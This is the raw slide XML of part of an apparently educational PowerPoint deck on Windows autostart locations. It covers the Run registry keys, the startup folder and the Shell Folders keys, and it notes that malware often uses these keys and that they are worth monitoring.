                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>autostart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Key</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29048"/>
            <a:ext cx="8496672" cy="435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520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31</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Example of the Second </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>autostart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Key</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04" y="1988840"/>
            <a:ext cx="8417768" cy="427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109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32</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>autostart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the registry on Windows 10, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>8.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>softwareok.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>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76099"/>
            <a:ext cx="6044902" cy="379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503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33</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>Delete </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>autostart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Key Value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>in the registry on Windows 10, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>8.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>softwareok.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3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2" y="2204864"/>
            <a:ext cx="627697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382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7660373" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>startup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>MS Windows 10 and 11 is a good way to auto start the programs with Windows 10 or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>11.</a:t>
            </a:r>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34</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>startup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>folder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>softwareok.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1961368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35</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Auto startup programs and APPs in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Windows-10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>softwareok.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="Change auto startup program and APPs settings in Window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794" y="1844824"/>
            <a:ext cx="5348486" cy="448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865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36</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>auto startup folder in Windows 10 current </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>softwareok.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW"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25" y="1700808"/>
            <a:ext cx="638175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666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6"/>
            <a:ext cx="8020413" cy="3777869"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Malware use these keys regularly and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>these keys are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the most over-used keys, simply because of their ease-of-use and purpose. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Monitor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>these keys to make sure no executable is being loaded (without your permissions of course, I only have my Antivirus loading here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Most services are required to run at boot time. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RunServices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and relevant keys are used to start up background services such as the “Remote Registry Service”. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>They’re </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>vital to your system’s performance (and very likely to be targeted by the malware!).</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37</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="872067" y="338328"/>
            <a:ext cx="7588366" cy="1252728"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Security Issues about the Keys </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>SyeedHasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="251041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2675467"/>
            <a:ext cx="8712967" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKCU\Software\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\Explorer\User Shell Folders </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKCU\Software\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\Explorer\Shell Folders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKLM\SOFTWARE\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\Explorer\Shell Folders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKLM\SOFTWARE\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\Explorer\User Shell Folders</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1500" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="226C10"/>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38</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Startup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Keys </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>SyeedHasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2884710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39</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
